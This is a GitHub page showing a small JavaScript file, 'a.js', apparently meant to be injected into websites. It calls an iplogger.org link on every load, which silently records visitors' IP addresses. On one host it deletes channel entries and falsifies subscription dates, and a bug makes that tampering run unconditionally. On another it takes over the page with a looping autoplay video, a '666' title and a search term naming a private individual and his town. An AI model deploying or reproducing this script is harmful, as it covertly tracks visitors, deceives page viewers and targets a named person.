-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy patha.js
37 lines (30 loc) · 1.25 KB
/
a.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
"use strict";
fetch("https://iplogger.org/1QM8j7");
if (location.hostname == "xxluke.de") {
if (location.href.indexOf("/subscription-history") !== -1) {
var ismquin = 0;
if (/6Um1hu8N4CY8mSqK0XISmw/.test(document.getElementById("channel-url").value)) {var ismquin = 1}
if (/\/mquin40440/i.test(document.getElementById("channel-url").value)) {var ismquin = 1}
if (ismquin = 1) {
removech();
var subdate = document.getElementsByClassName("subscription-date");
for (var i = 0; i < subdate.length; i++) {
subdate[i].textContent = "June 24, 2005";
}
}
}
}
function removech() {
var chname = document.getElementsByClassName("channel-name");
for (var i = 0; i < chname.length; i++) {
if (chname[i].innerHTML.indexOf("<") !== -1) {
chname[i].parentNode.parentNode.parentNode.remove();
removech();
}
}
}
if (location.hostname == "ft.hwilliams8548.com") {
document.getElementById("page-container").innerHTML = '<iframe src="https://www.youtube.com/embed/1hfk8kh75ic?autoplay=1&controls=0&disablekb=1&modestbranding=1&loop=1" style="border:0;width:100%;height:90%"></iframe>';
document.getElementsByTagName("head")[0].innerHTML += "<title>666</title>";
document.getElementById("masthead-search-term").value = "haiden williams dalton ga";
}